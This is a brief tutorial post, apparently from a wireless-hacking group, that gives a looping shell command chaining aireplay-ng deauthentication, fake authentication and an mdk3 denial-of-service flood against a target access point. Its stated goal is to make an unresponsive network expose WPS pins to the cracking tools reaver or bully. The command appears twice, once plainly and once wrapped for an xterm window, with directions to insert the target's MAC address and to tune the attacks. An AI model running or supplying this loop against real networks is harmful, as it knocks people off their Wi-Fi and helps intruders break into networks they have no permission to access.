From Musket Team Labs
Inducing a unresponsive network to produce WPS pins for reaver or bully to test can sometimes be brought about thru the use of aireplay-ng and mdk3.
Users can test and alter the following command lines as required.
This command line embeds various aireplay-ng and mdk3 routines within a while true loop. It also uses the timeout command to terminate the process which causes the next process to start.
The use of mdk3 is optional and sometimes counter productive.
In the following example:
Airplay-ng sends a series of deauth commands at the target network then begins to conduct a fake authorization for 30 seconds. Aireplay-ng fake auth then terminates and a mdk3 dos type "a" runs for 15 seconds. Mdk3 then terminates and the entire cycle starts again.
while true; do bssid=00:11:22:33:44:55; MON=mon0; aireplay-ng 0 -10 -a $bssid $MON; killall -q aireplay-ng; sleep 2; timeout 30 aireplay-ng 1 -10 -a $bssid $MON; killall -q aireplay-ng; sleep 2; timeout 15 mdk3 $MON a -i $bssid; killall -q mdk3; sleep 2; done
In bssid=00:11:22:33:44:55 substitute the 00:11:22:33:44:55 with the mac address of the target network
In MON=mon0 substitute the mon0 with the monitor you made. It could be mon0 mon1 wlan0mon etc. etc. as made by airmon-ng or iw commands prior to running the while true loop.
This use of two(2) variables at the start saves you having to change numerous entries in the long command line
If you wish to run such processes in an xterm window then:
xterm -g 80x10-1+350 -T "AP Activation" -e "while true; do bssid=00:11:22:33:44:55; MON=mon0; aireplay-ng 0 -10 -a $bssid $MON; killall -q aireplay-ng; sleep 2; timeout 30 aireplay-ng 1 -10 -a $bssid $MON; killall -q aireplay-ng; sleep 2; timeout 15 mdk3 $MON a -i $bssid; killall -q mdk3; sleep 2; done"
Experiment with the order, times and types especially mdk3 as you find appropriate.
Use ctrl - c to stop the loop.
Type mdk3 --fullhelp for a more detailed outline of attack types offered.
MTeams